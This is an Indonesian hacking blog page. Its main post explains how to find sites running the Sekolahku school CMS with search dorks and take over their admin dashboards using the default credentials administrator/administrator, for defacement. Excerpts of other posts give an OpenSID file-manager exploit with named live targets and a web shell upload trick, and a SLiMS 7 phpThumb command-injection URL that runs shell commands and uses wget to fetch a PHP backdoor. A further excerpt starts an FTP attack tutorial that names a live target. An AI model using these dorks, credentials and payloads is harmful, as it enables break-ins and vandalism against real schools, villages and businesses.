Langsung ke konten utama

Default Cms Sekolahku


Cms Sekolahku


DORK :
- "powered by sekolahku.web.id" intext:"nama kota" (KEMBANGIN)
- "Developed by sekolahku.web.id" ( kembangin )
-
EXPLOIT :
- login / patch/login
- u/p : administrator





dorking dengan dork di atas...lalu tambahkan /login / patch/login untuk login ke dashboard admin
lalu masukin username + passwordnya = administrator jika web tersebut vuln kalian akan di arahkan ke dashboard adminya

sekian tutornya jika masih ragu sama tutor ini kalian bisa cek videonya

DEFACE POC DEFAULT CMS SEKOLAHKU :


Komentar

Postingan populer dari blog ini

Deface Poc RFM OpenSID

Dork: "OpenSID Tangerang"            "OpenSID Bandung"            "Desa SID site:"           Exploit: /assets/filemanager/dialog.php?akey=GantiKunciDesa Dorking Dulu Lah Kalianya Nih Live Target : http://kalidengen-kulonprogo.desa.id http://pantaigading.opendesa.id/ Tambahkan Exploitnya..... Terus ntar ada tuh Rfm atau Responsif FileManager Kalian Upload Mini Shell / Uploader Kalian Kalau bisa Rename Jadi format.txt misalnya (shell.php<?.txt) nah itu ntar itu pasti langsung berubah jadi format php...txtnya dah keinject ama <? Nih Comot Mini Uploader Buat Up Shell //Powered By Mr.Colded X Mr.Cold// //Team : 3RROR YOUR SYSTEM // <title>./CryMera - FR13NDS CYBER ARMY </title><center> <body bgcolor= "black" >     <br><br><br><br>     <br>     <font color= "lime" size= "5" >> ./CryMera <</font> <font color= "r

Slims Command Injection

 Slims 7 PhpThumb Command Injection Dork : Powered By SLIMS 7 (Cendana)  inurl:/index.php?p=show_detail&id= "Detail Cantuman" site:ac.id "Powered By Slims7" site:ac.id ~~~~ Check Vuln (command injected) : /lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg%20;ls -la;%20&phpThumbDebug=9 Upload shell : /lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg%20;wget%20https://raw.githubusercontent.com/backdoorhub/shell-backdoor-list/master/shell/php/mini.php;%20&phpThumbDebug=9 File access : /lib/watermark/shell.php References : https://www.bandung6etar.my.id/2020/09/deface-cms-slims-command-injection.html

Deface poc Ftp Server Attack

Assalamualaikum wr.wb Bagaimana kabar saudara sekalian?? Baik pasti nya yaa Oke di tutorial deface ini saya mau membagikan poc ftp server attack Yang dimana si hacker mengakses data data penting di ftp web tersebut Ada beberapa teknik si hacker mendapatkan akses ke ftp web, Salah satu nya di brute force yaitu mencari password default dari domain web nya Oke dah langsung aja ke tutorialnya Gosah banyak cingcong gosah banyak bacot kalo kata lider kami si padang :v Bahan-bahan : - Dork > intitle:"index of" sftp-config.json            > intitle:"index of" ftpsync.settings - Apk ftp - Shell backdoor, kalo lu gakda shell cek aja di blog ini,, minishell backdoor ~ power f ~ akun pebeh  Gass bewan awp di burning hall :v Oke gesss +Pertama kita buka Apeka ep te pe nya terlebih dahulu eaaa, Live target gue => http://vakantievillacalpedylano.be +Yang kedua kalian pastikan ada akun ftp di web target, +Ketiga kalian masukan host,port,user passwor